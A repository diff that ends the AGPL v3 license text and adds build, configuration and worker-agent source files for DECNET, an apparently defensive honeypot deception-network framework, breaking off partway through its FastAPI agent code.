 violation by some reasonable means, this is the first time you have
 received notice of violation of this License (for any work) from that
 copyright holder, and you cure the violation prior to 30 days after
 your receipt of the notice.
  Termination of your rights under this section does not terminate the
 licenses of parties who have received copies or rights from you under
 this License.  If your rights have been terminated and not permanently
 reinstated, you do not qualify to receive new licenses for the same
 material under section 10.
  9. Acceptance Not Required for Having Copies.
  You are not required to accept this License in order to receive or
 run a copy of the Program.  Ancillary propagation of a covered work
 occurring solely as a consequence of using peer-to-peer transmission
 to receive a copy likewise does not require acceptance.  However,
 nothing other than this License grants you permission to propagate or
 modify any covered work.  These actions infringe copyright if you do
 not accept this License.  Therefore, by modifying or propagating a
 covered work, you indicate your acceptance of this License to do so.
  10. Automatic Licensing of Downstream Recipients.
  Each time you convey a covered work, the recipient automatically
 receives a license from the original licensors, to run, modify and
 propagate that work, subject to this License.  You are not responsible
 for enforcing compliance by third parties with this License.
  An "entity transaction" is a transaction transferring control of an
 organization, or substantially all assets of one, or subdividing an
 organization, or merging organizations.  If propagation of a covered
 work results from an entity transaction, each party to that
 transaction who receives a copy of the work also receives whatever
 licenses to the work the party's predecessor in interest had or could
 give under the previous paragraph, plus a right to possession of the
 Corresponding Source of the work from the predecessor in interest, if
 the predecessor has it or can get it with reasonable efforts.
  You may not impose any further restrictions on the exercise of the
 rights granted or affirmed under this License.  For example, you may
 not impose a license fee, royalty, or other charge for exercise of
 rights granted under this License, and you may not initiate litigation
 (including a cross-claim or counterclaim in a lawsuit) alleging that
 any patent claim is infringed by making, using, selling, offering for
 sale, or importing the Program or any portion of it.
  11. Patents.
  A "contributor" is a copyright holder who authorizes use under this
 License of the Program or a work on which the Program is based.  The
 work thus licensed is called the contributor's "contributor version".
  A contributor's "essential patent claims" are all patent claims
 owned or controlled by the contributor, whether already acquired or
 hereafter acquired, that would be infringed by some manner, permitted
 by this License, of making, using, or selling its contributor version,
 but do not include claims that would be infringed only as a
 consequence of further modification of the contributor version.  For
 purposes of this definition, "control" includes the right to grant
 patent sublicenses in a manner consistent with the requirements of
 this License.
  Each contributor grants you a non-exclusive, worldwide, royalty-free
 patent license under the contributor's essential patent claims, to
 make, use, sell, offer for sale, import and otherwise run, modify and
 propagate the contents of its contributor version.
  In the following three paragraphs, a "patent license" is any express
 agreement or commitment, however denominated, not to enforce a patent
 (such as an express permission to practice a patent or covenant not to
 sue for patent infringement).  To "grant" such a patent license to a
 party means to make such an agreement or commitment not to enforce a
 patent against the party.
  If you convey a covered work, knowingly relying on a patent license,
 and the Corresponding Source of the work is not available for anyone
 to copy, free of charge and under the terms of this License, through a
 publicly available network server or other readily accessible means,
 then you must either (1) cause the Corresponding Source to be so
 available, or (2) arrange to deprive yourself of the benefit of the
 patent license for this particular work, or (3) arrange, in a manner
 consistent with the requirements of this License, to extend the patent
 license to downstream recipients.  "Knowingly relying" means you have
 actual knowledge that, but for the patent license, your conveying the
 covered work in a country, or your recipient's use of the covered work
 in a country, would infringe one or more identifiable patents in that
 country that you have reason to believe are valid.
  If, pursuant to or in connection with a single transaction or
 arrangement, you convey, or propagate by procuring conveyance of, a
 covered work, and grant a patent license to some of the parties
 receiving the covered work authorizing them to use, propagate, modify
 or convey a specific copy of the covered work, then the patent license
 you grant is automatically extended to all recipients of the covered
 work and works based on it.
  A patent license is "discriminatory" if it does not include within
 the scope of its coverage, prohibits the exercise of, or is
 conditioned on the non-exercise of one or more of the rights that are
 specifically granted under this License.  You may not convey a covered
 work if you are a party to an arrangement with a third party that is
 in the business of distributing software, under which you make payment
 to the third party based on the extent of your activity of conveying
 the work, and under which the third party grants, to any of the
 parties who would receive the covered work from you, a discriminatory
 patent license (a) in connection with copies of the covered work
 conveyed by you (or copies made from those copies), or (b) primarily
 for and in connection with specific products or compilations that
 contain the covered work, unless you entered into that arrangement,
 or that patent license was granted, prior to 28 March 2007.
  Nothing in this License shall be construed as excluding or limiting
 any implied license or other defenses to infringement that may
 otherwise be available to you under applicable patent law.
  12. No Surrender of Others' Freedom.
  If conditions are imposed on you (whether by court order, agreement or
 otherwise) that contradict the conditions of this License, they do not
 excuse you from the conditions of this License.  If you cannot convey a
 covered work so as to satisfy simultaneously your obligations under this
 License and any other pertinent obligations, then as a consequence you may
 not convey it at all.  For example, if you agree to terms that obligate you
 to collect a royalty for further conveying from those to whom you convey
 the Program, the only way you could satisfy both those terms and this
 License would be to refrain entirely from conveying the Program.
  13. Remote Network Interaction; Use with the GNU General Public License.
  Notwithstanding any other provision of this License, if you modify the
 Program, your modified version must prominently offer all users
 interacting with it remotely through a computer network (if your version
 supports such interaction) an opportunity to receive the Corresponding
 Source of your version by providing access to the Corresponding Source
 from a network server at no charge, through some standard or customary
 means of facilitating copying of software.  This Corresponding Source
 shall include the Corresponding Source for any work covered by version 3
 of the GNU General Public License that is incorporated pursuant to the
 following paragraph.
  Notwithstanding any other provision of this License, you have
 permission to link or combine any covered work with a work licensed
 under version 3 of the GNU General Public License into a single
 combined work, and to convey the resulting work.  The terms of this
 License will continue to apply to the part which is the covered work,
 but the work with which it is combined will remain governed by version
 3 of the GNU General Public License.
  14. Revised Versions of this License.
  The Free Software Foundation may publish revised and/or new versions of
 the GNU Affero General Public License from time to time.  Such new versions
 will be similar in spirit to the present version, but may differ in detail to
 address new problems or concerns.
  Each version is given a distinguishing version number.  If the
 Program specifies that a certain numbered version of the GNU Affero General
 Public License "or any later version" applies to it, you have the
 option of following the terms and conditions either of that numbered
 version or of any later version published by the Free Software
 Foundation.  If the Program does not specify a version number of the
 GNU Affero General Public License, you may choose any version ever published
 by the Free Software Foundation.
  If the Program specifies that a proxy can decide which future
 versions of the GNU Affero General Public License can be used, that proxy's
 public statement of acceptance of a version permanently authorizes you
 to choose that version for the Program.
  Later license versions may give you additional or different
 permissions.  However, no additional obligations are imposed on any
 author or copyright holder as a result of your choosing to follow a
 later version.
  15. Disclaimer of Warranty.
  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
 APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
 HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
 OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
 THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
 PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
 IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
 ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
  16. Limitation of Liability.
  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
 WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
 THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
 GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
 USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
 DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
 PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
 EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
 SUCH DAMAGES.
  17. Interpretation of Sections 15 and 16.
  If the disclaimer of warranty and limitation of liability provided
 above cannot be given local legal effect according to their terms,
 reviewing courts shall apply local law that most closely approximates
 an absolute waiver of all civil liability in connection with the
 Program, unless a warranty or assumption of liability accompanies a
 copy of the Program in return for a fee.
                     END OF TERMS AND CONDITIONS
            How to Apply These Terms to Your New Programs
  If you develop a new program, and you want it to be of the greatest
 possible use to the public, the best way to achieve this is to make it
 free software which everyone can redistribute and change under these terms.
  To do so, attach the following notices to the program.  It is safest
 to attach them to the start of each source file to most effectively
 state the exclusion of warranty; and each file should have at least
 the "copyright" line and a pointer to where the full notice is found.
    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU Affero General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU Affero General Public License for more details.
    You should have received a copy of the GNU Affero General Public License
    along with this program.  If not, see <https://www.gnu.org/licenses/>.
 Also add information on how to contact you by electronic and paper mail.
  If your software can interact with users remotely through a computer
 network, you should also make sure that it provides a way for users to
 get its source.  For example, if your program is a web application, its
 interface could display a "Source" link that leads users to an archive
 of the code.  There are many ways you could offer source, and different
 solutions will be better for different programs; see section 13 for the
 specific requirements.
  You should also get your employer (if you work as a programmer) or school,
 if any, to sign a "copyright disclaimer" for the program, if necessary.
 For more information on this, and how to apply and follow the GNU AGPL, see
 <https://www.gnu.org/licenses/>.
--- a/261
+++ b/261
@@ -0,0 +1,261 @@
 # Path to the pytest executable used by every pytest-based target below.
 PYTEST     := .311/bin/pytest
 # FAIL_FAST=1 makes the looping targets (test-go, test-all, build-all) exit at
 # the first failure; any other value lets them continue and report at the end.
 FAIL_FAST  ?= 1
 # NO_CACHE=1 makes build-all pass --no-cache to docker build.
 NO_CACHE   ?= 0
 # Extra arguments appended to the pytest and npm command lines (empty by default).
 ARGS       :=
 # addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
 # Unit suites inherit that; special suites clear it with --override-ini.
 UNIT_FLAGS  := --timeout=30 --timeout-method=thread
 # NOTE(review): the name and the section headers call these suites
 # "sequential", yet the flags pass `-n logical` to xdist — confirm which one
 # is intended.
 SEQ_FLAGS   := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
 # Fuzz runs select -m fuzz and ignore the schemathesis files, which the
 # test-schema target runs on its own. No --timeout is set here.
 FUZZ_FLAGS  := --override-ini="addopts=-v -x" -n logical -m fuzz \
 	--ignore=tests/api/test_schemathesis.py \
 	--ignore=tests/api/test_schemathesis_agent.py \
 	--ignore=tests/api/test_schemathesis_swarm.py \
 	--ignore=tests/api/test_schemathesis_ttp.py
 # SCHEMA_QUICK is placed in pytest's environment by the test-schema target.
 SCHEMA_QUICK ?= 0
 SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
 # Benchmarks disable xdist (-p no:xdist) and select -m bench.
 BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
 # ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
 # One target per group of tests/ directories. Every recipe has the same shape:
 # pytest, the directory list, $(UNIT_FLAGS), then the caller's $(ARGS).
 # None of these names is a real file, so they are all declared phony up front.
 .PHONY: test-core test-web test-db test-bus test-ttp test-intel \
         test-analysis test-infra test-fleet test-cli test-features
 test-core:
 	$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
 test-web:
 	$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
 test-db:
 	$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
 test-bus:
 	$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
 test-ttp:
 	$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
 test-intel:
 	$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
 test-analysis:
 	$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
 test-infra:
 	$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
 test-fleet:
 	$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
 test-cli:
 	$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
 test-features:
 	$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
 # ── Go and React suites ───────────────────────────────────────────────────────
 # Directories that each get their own `go test ./...` run.
 _GO_MODULES := \
 	decnet/templates/_caddy_modules/decnetfp \
 	decnet/templates/http/_caddy_modules/decnetfp \
 	decnet/templates/https/_caddy_modules/decnetfp
 # Runs `go test ./...` inside every directory of _GO_MODULES, printing a
 # [PASS]/[FAIL] line per directory. With FAIL_FAST=1 the recipe exits on the
 # first failing directory; otherwise it finishes the loop and exits non-zero
 # if any directory failed.
 .PHONY: test-go
 test-go:
 	@failed=""; \
 	for module in $(_GO_MODULES); do \
 		echo "=== go test: $$module ==="; \
 		if ! (cd "$$module" && go test ./...); then \
 			echo "[FAIL] $$module"; \
 			failed="$$failed $$module"; \
 			[ "$(FAIL_FAST)" != "1" ] || exit 1; \
 			continue; \
 		fi; \
 		echo "[PASS] $$module"; \
 	done; \
 	test -z "$$failed"
 # Runs the `test:run` npm script from inside decnet_web, appending $(ARGS).
 # NOTE(review): npm may interpret dash-prefixed options in $(ARGS) itself
 # unless they follow a `--` separator — confirm before relying on passthrough.
 .PHONY: test-react
 test-react:
 	cd decnet_web && npm run test:run $(ARGS)
 # ── Special suites (addopts overridden per suite) ─────────────────────────────
 # These targets do not inherit the pyproject addopts: each one passes a flags
 # variable (SEQ_FLAGS, FUZZ_FLAGS, SCHEMA_FLAGS or BENCH_FLAGS) that replaces
 # them via --override-ini. $(ARGS) is appended last in every recipe.
 .PHONY: test-live test-api test-stress test-service \
         test-fuzz test-schema test-bench test-docker
 test-live:
 	$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
 test-api:
 	$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
 test-stress:
 	$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
 test-service:
 	$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
 # No path argument: FUZZ_FLAGS selects by marker and ignores the schemathesis files.
 test-fuzz:
 	$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
 # Runs only the four schemathesis files, with SCHEMA_QUICK set in pytest's environment.
 test-schema:
 	SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
 		tests/api/test_schemathesis.py \
 		tests/api/test_schemathesis_agent.py \
 		tests/api/test_schemathesis_swarm.py \
 		tests/api/test_schemathesis_ttp.py \
 		$(SCHEMA_FLAGS) $(ARGS)
 test-bench:
 	$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
 # DECNET_LIVE_DOCKER=1 is set for the pytest process by the recipe itself.
 test-docker:
 	DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
 # ── Static analysis ───────────────────────────────────────────────────────────
 # Each target invokes one tool from .311/bin; none of them uses $(ARGS).
 .PHONY: test-mypy test-bandit test-vulture test-pip-audit
 test-mypy:
 	.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
 test-bandit:
 	.311/bin/bandit -r decnet -c pyproject.toml
 test-vulture:
 	.311/bin/vulture decnet --min-confidence 80
 test-pip-audit:
 	.311/bin/pip-audit
 # ── Composite: all suites ─────────────────────────────────────────────────────
 # Suite names, in run order; each one maps to the target test-<name>.
 _ALL_SUITES := \
 	core web db bus ttp intel analysis infra fleet cli features \
 	go react \
 	live api schema stress service fuzz bench docker \
 	mypy bandit vulture pip-audit
 # Runs every suite through a sub-make, forwarding ARGS, and prints a
 # [PASS]/[FAIL] line per suite. With FAIL_FAST=1 the first failure ends the
 # run; otherwise all suites run and the failed ones are listed at the end.
 # Exit status is non-zero whenever at least one suite failed.
 .PHONY: test-all test
 test-all test:
 	@failed=""; \
 	for suite in $(_ALL_SUITES); do \
 		echo ""; \
 		echo "══════════════════════════ $$suite ══════════════════════════"; \
 		if ! $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
 			echo "[FAIL] $$suite"; \
 			failed="$$failed $$suite"; \
 			if [ "$(FAIL_FAST)" = "1" ]; then \
 				echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
 				exit 1; \
 			fi; \
 			continue; \
 		fi; \
 		echo "[PASS] $$suite"; \
 	done; \
 	if [ -z "$$failed" ]; then \
 		echo ""; \
 		echo "All suites passed."; \
 		exit 0; \
 	fi; \
 	echo ""; \
 	echo "Failed:$$failed"; \
 	exit 1
 # ── Decky image pre-build ─────────────────────────────────────────────────────
 # Template directory names under decnet/templates/, one image per name.
 _DECKY_TEMPLATES := \
 	conpot docker_api elasticsearch ftp http https imap k8s ldap \
 	llmnr mongodb mqtt mssql mysql pop3 postgres rdp redis sip smb smtp \
 	sniffer snmp ssh telnet tftp vnc
 # Builds decnet/<svc>:latest from decnet/templates/<svc> for every template,
 # with DOCKER_BUILDKIT=1. NO_CACHE=1 adds --no-cache to each build.
 # With FAIL_FAST=1 the first failed build ends the run; otherwise every
 # template is attempted and the failures are listed before exiting non-zero.
 .PHONY: build-all
 build-all:
 	@failed=""; \
 	cache_flag=""; \
 	if [ "$(NO_CACHE)" = "1" ]; then cache_flag="--no-cache"; fi; \
 	for svc in $(_DECKY_TEMPLATES); do \
 		echo ""; \
 		echo "══════════════════════════ $$svc ══════════════════════════"; \
 		if ! DOCKER_BUILDKIT=1 docker build $$cache_flag \
 				-t decnet/$$svc:latest \
 				decnet/templates/$$svc; then \
 			echo "[FAIL] $$svc"; \
 			failed="$$failed $$svc"; \
 			if [ "$(FAIL_FAST)" = "1" ]; then \
 				echo "Stopping at first failure. Use FAIL_FAST=0 to build all."; \
 				exit 1; \
 			fi; \
 			continue; \
 		fi; \
 		echo "[BUILT] $$svc"; \
 	done; \
 	if [ -z "$$failed" ]; then \
 		echo ""; \
 		echo "All decky images built."; \
 		exit 0; \
 	fi; \
 	echo ""; \
 	echo "Failed:$$failed"; \
 	exit 1
 # Prints a usage summary of the targets in this Makefile, grouped by kind.
 # The text is hand-maintained, so it has to be kept in step with the rules:
 #   - test-schema runs with SCHEMA_FLAGS (`-n 4`, 600s timeout), not `-n logical`;
 #   - test-all iterates _ALL_SUITES, which includes the `service` suite;
 #   - test-docker sets DECNET_LIVE_DOCKER=1 itself, the caller does not have to.
 .PHONY: help
 help:
 	@echo "Unit suites (xdist, 30s timeout):"
 	@echo "  make test-core      tests/core + config + factories + fixtures"
 	@echo "  make test-web       tests/web + services"
 	@echo "  make test-db        tests/db + vectorstore"
 	@echo "  make test-bus       tests/bus + logging + telemetry"
 	@echo "  make test-ttp       tests/ttp"
 	@echo "  make test-intel     tests/intel + asn + geoip"
 	@echo "  make test-analysis  tests/clustering + correlation"
 	@echo "  make test-infra     tests/agent + collector + sniffer + profiler"
 	@echo "  make test-fleet     tests/fleet + swarm + topology + orchestrator + deploy + updater"
 	@echo "  make test-cli       tests/cli + engine + mutator + realism"
 	@echo "  make test-features  tests/canary + artifacts + webhook + decky_io + prober"
 	@echo ""
 	@echo "Go / React suites:"
 	@echo "  make test-go        go test ./... in each Caddy module variant"
 	@echo "  make test-react     vitest run in decnet_web"
 	@echo ""
 	@echo "Special suites (sequential, 120s timeout):"
 	@echo "  make test-live      tests/live"
 	@echo "  make test-api       tests/api  (schemathesis)"
 	@echo "  make test-stress    tests/stress"
 	@echo "  make test-service   tests/service_testing"
 	@echo "  make test-schema              schemathesis contract tests (-m fuzz, xdist -n 4, 600s timeout)"
 	@echo "  make test-schema SCHEMA_QUICK=1   same, capped at 100 examples per test"
 	@echo "  make test-fuzz      hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
 	@echo "  make test-bench     tests/perf"
 	@echo "  make test-docker    tests/docker  (target sets DECNET_LIVE_DOCKER=1)"
 	@echo ""
 	@echo "Static analysis:"
 	@echo "  make test-mypy      mypy type check on decnet/"
 	@echo "  make test-bandit    bandit security scan on decnet/"
 	@echo "  make test-vulture   vulture dead code scan (>=80% confidence)"
 	@echo "  make test-pip-audit pip-audit dependency vulnerability scan"
 	@echo ""
 	@echo "Composites:"
 	@echo "  make test-all       ALL suites (unit + go + react + live + api + schema + stress + service + fuzz + bench + docker + static analysis)"
 	@echo "  make test-all FAIL_FAST=0   same, report all failures instead of stopping"
 	@echo ""
 	@echo "Passthrough: make test-web ARGS='--lf -s'"
 	@echo ""
 	@echo "Decky images:"
 	@echo "  make build-all              build decnet/<svc>:latest for all 27 decky templates"
 	@echo "  make build-all NO_CACHE=1   same, bypassing Docker layer cache"
 	@echo "  make build-all FAIL_FAST=0  same, continue past failures"
--- a/README.md
+++ b/README.md
--- a/bait/.gitkeep
+++ b/bait/.gitkeep
--- a/bait/README.md
+++ b/bait/README.md
@@ -0,0 +1,5 @@
 # bait/
 Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries are appended to the hardcoded bait baseline: they add to the realism-engine output and never replace it.
 JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
--- a/decnet.collector.log
+++ b/decnet.collector.log
@@ -1 +0,0 @@
 Collector starting → /home/anti/Tools/DECNET/decnet.log
--- a/decnet.ini.example
+++ b/decnet.ini.example
@@ -0,0 +1,64 @@
 ; /etc/decnet/decnet.ini — DECNET host configuration
 ;
 ; Copy to /etc/decnet/decnet.ini and edit. Values here seed os.environ at
 ; CLI startup via setdefault() — real env vars still win, so you can
 ; override any value on the shell without editing this file.
 ;
 ; A missing file is fine; every daemon has sensible defaults. The main
 ; reason to use this file is to skip typing the same flags on every
 ; `decnet` invocation and to pin a host's role via `mode`.
 [decnet]
 ; mode = agent | master
 ;   agent  — worker host (runs `decnet agent`, `decnet forwarder`, `decnet updater`).
 ;            Master-only commands (api, swarmctl, swarm, deploy, teardown, ...)
 ;            are hidden from `decnet --help` and refuse to run.
 ;   master — central server (runs `decnet api`, `decnet web`, `decnet swarmctl`,
 ;            `decnet listener`). All commands visible.
 mode = agent
 ; disallow-master = true (default when mode=agent)
 ; Set to false for hybrid dev hosts that legitimately run both roles.
 disallow-master = true
 ; log-directory — root for DECNET's per-component logs. Systemd units set
 ; DECNET_SYSTEM_LOGS=<log-directory>/decnet.<component>.log so agent, forwarder,
 ; and engine each get their own file. The forwarder tails decnet.log.
 log-directory = /var/log/decnet
 ; ─── Agent-only settings (read when mode=agent) ───────────────────────────
 [agent]
 ; Where the master's syslog-TLS listener lives. DECNET_SWARM_MASTER_HOST.
 master-host = 192.168.1.50
 ; Master listener port (RFC 5425 default 6514). DECNET_SWARM_SYSLOG_PORT.
 swarm-syslog-port = 6514
 ; Bind address/port for this worker's agent API (mTLS).
 agent-port = 8765
 ; Cert bundle dir — must contain ca.crt, worker.crt, worker.key from enroll.
 ; DECNET_AGENT_DIR — honored by the forwarder child as well.
 agent-dir = /home/anti/.decnet/agent
 ; Updater cert bundle (required for `decnet updater`).
 updater-dir = /home/anti/.decnet/updater
 ; ─── Master-only settings (read when mode=master) ─────────────────────────
 [master]
 ; Main API (REST for the React dashboard). DECNET_API_HOST / _PORT.
 api-host = 0.0.0.0
 api-port = 8000
 ; React dev-server dashboard (`decnet web`). DECNET_WEB_HOST / _PORT.
 web-host = 0.0.0.0
 web-port = 8080
 ; Swarm controller (master-internal). DECNET_SWARMCTL_HOST isn't exposed
 ; under that name today — this block is the forward-compatible spelling.
 ; swarmctl-host = 127.0.0.1
 ; swarmctl-port = 8770
 ; Syslog-over-TLS listener bind address and port. DECNET_LISTENER_HOST and
 ; DECNET_SWARM_SYSLOG_PORT. The listener is auto-spawned by `decnet swarmctl`.
 listener-host = 0.0.0.0
 swarm-syslog-port = 6514
 ; Master CA dir (for enroll / swarm cert issuance).
 ; ca-dir = /home/anti/.decnet/ca
 ; JWT secret for the web API. MUST be set; 32+ bytes. Keep out of git.
 ; jwt-secret = REPLACE_ME_WITH_A_32_BYTE_SECRET
--- a/decnet.tar
+++ b/decnet.tar
--- a/decnet/init.py
+++ b/decnet/init.py
@@ -0,0 +1,13 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """DECNET — honeypot deception-network framework.
 This __init__ runs once, on the first `import decnet.*`. It seeds
 os.environ from /etc/decnet/decnet.ini (if present) so that later
 module-level reads in decnet.env pick up the INI values as if they had
 been exported by the shell. Real env vars always win via setdefault().
 Kept minimal on purpose — any heavier work belongs in a submodule.
 """
 from decnet.config_ini import load_ini_config as _load_ini_config
 _load_ini_config()
--- a/decnet/agent/init.py
+++ b/decnet/agent/init.py
@@ -0,0 +1,8 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """DECNET worker agent — runs on every SWARM worker host.
 Exposes an mTLS-protected FastAPI service the master's SWARM controller
 calls to deploy, mutate, and tear down deckies locally.  The agent reuses
 the existing `decnet.engine.deployer` code path unchanged, so a worker runs
 deckies the same way `decnet deploy --mode unihost` does today.
 """
--- a/decnet/agent/app.py
+++ b/decnet/agent/app.py
@@ -0,0 +1,366 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Worker-side FastAPI app.
 Protected by mTLS at the ASGI/uvicorn transport layer: uvicorn is started
 with ``--ssl-ca-certs`` + ``--ssl-cert-reqs 2`` (CERT_REQUIRED), so any
 client that cannot prove a cert signed by the DECNET CA is rejected before
 reaching a handler.  Once past the TLS handshake, all peers are trusted
 equally (the only entity holding a CA-signed cert is the master
 controller).
 Endpoints mirror the existing unihost CLI verbs:
 * ``POST /deploy``   — body: serialized ``DecnetConfig``
 * ``POST /teardown`` — body: optional ``{"decky_id": "..."}``
 * ``POST /mutate``   — body: ``{"decky_id": "...", "services": [...]}``
 * ``GET  /status``   — deployment snapshot
 * ``GET  /health``   — liveness probe; mTLS is still required (the master
  pings it with its own cert).
 """
 from __future__ import annotations
 import asyncio
 import os
 import pathlib
 from contextlib import asynccontextmanager
 from typing import Any, Optional
 from fastapi import FastAPI, HTTPException
 from fastapi.responses import JSONResponse
 from pydantic import BaseModel, Field
 import contextlib
 from decnet.agent import executor as _exec
 from decnet.agent import heartbeat as _heartbeat
 from decnet.agent import topology_ops as _topology_ops
 from decnet.bus.factory import get_bus
 from decnet.bus.publish import run_health_heartbeat
 from decnet.swarm.pki import DEFAULT_AGENT_DIR
 from decnet.agent.topology_store import AlreadyApplied, TopologyStore
 from decnet.config import DecnetConfig
 from decnet.logging import get_logger
 from decnet.topology.validate import ValidationError
 log = get_logger("agent.app")
 def _resolve_agent_dir() -> pathlib.Path:
    env = os.environ.get("DECNET_AGENT_DIR")
    if env:
        return pathlib.Path(env)
    system = pathlib.Path("/etc/decnet/agent")
    if system.exists():
        return system
    return DEFAULT_AGENT_DIR
 # Module-level singleton.  Created lazily on first use so tests can
 # monkeypatch DECNET_AGENT_DIR before the store binds to a path.
 _topology_store: Optional[TopologyStore] = None
 def _store() -> TopologyStore:
    """Return the module-wide ``TopologyStore``, creating it on first call.

    The store is opened on ``topology.db`` inside the directory that
    ``_resolve_agent_dir()`` returns at the time of that first call.
    """
    global _topology_store
    store = _topology_store
    if store is None:
        store = TopologyStore(_resolve_agent_dir() / "topology.db")
        _topology_store = store
    return store
 _collector_task: Optional[asyncio.Task] = None
 def _ensure_collector_started() -> None:
    """Start the agent's log-collector task unless one is already running.

    Called from /topology/apply after a successful materialise.  It is kept
    out of the lifespan hook on purpose: the agent's boot invariant is
    "never touch docker until master tells us to" (see
    tests/swarm/test_agent_no_auto_restore.py).

    The collector is handed ``DECNET_AGENT_LOG_FILE`` as its output file.
    If the collector worker cannot be imported, a warning is logged and
    nothing is started.  Calling this while the task is still running is a
    no-op.
    """
    global _collector_task
    current = _collector_task
    if current is not None and not current.done():
        return

    from decnet.env import DECNET_AGENT_LOG_FILE

    try:
        from decnet.collector.worker import log_collector_worker
    except Exception:  # noqa: BLE001 — docker may be unavailable on dev
        log.warning(
            "agent log collector not starting — collector worker import failed",
            exc_info=True,
        )
        return

    collector_coro = log_collector_worker(DECNET_AGENT_LOG_FILE)
    _collector_task = asyncio.create_task(collector_coro, name="agent-log-collector")
    log.info("agent log collector started log_file=%s", DECNET_AGENT_LOG_FILE)
 _bus_heartbeat_task: Optional[asyncio.Task] = None
@asynccontextmanager
 async def _lifespan(app: FastAPI):
    """FastAPI lifespan hook for the agent.

    Startup: starts the master-facing heartbeat, tries to connect to the
    host-local bus, and spawns the bus health-heartbeat task.

    Shutdown (in this order): stops the master-facing heartbeat, cancels the
    bus heartbeat task, closes the bus, cancels the log-collector task if it
    is running, and closes the topology store if one was opened.
    """
    # Best-effort: if identity/bundle plumbing isn't configured (e.g. dev
    # runs or non-enrolled hosts), heartbeat.start() is a silent no-op.
    _heartbeat.start()
    # Host-local bus heartbeat (system.agent.health).  Separate channel
    # from the mTLS master-facing heartbeat above; this one lets peers on
    # the same host (dashboard, updater) see the agent is alive without
    # hitting its HTTPS endpoint.  Bus-disabled path is a no-op loop.
    bus = None
    try:
        bus = get_bus(client_name="agent")
        await bus.connect()
    except Exception as exc:  # noqa: BLE001
        log.warning("agent: bus unavailable, skipping health heartbeat: %s", exc)
        bus = None
    # The task is created even when ``bus`` is None; run_health_heartbeat
    # receives None in that case.
    global _bus_heartbeat_task
    _bus_heartbeat_task = asyncio.create_task(
        run_health_heartbeat(bus, "agent"),
        name="agent-bus-heartbeat",
    )
    try:
        yield
    finally:
        await _heartbeat.stop()
        if _bus_heartbeat_task is not None:
            _bus_heartbeat_task.cancel()
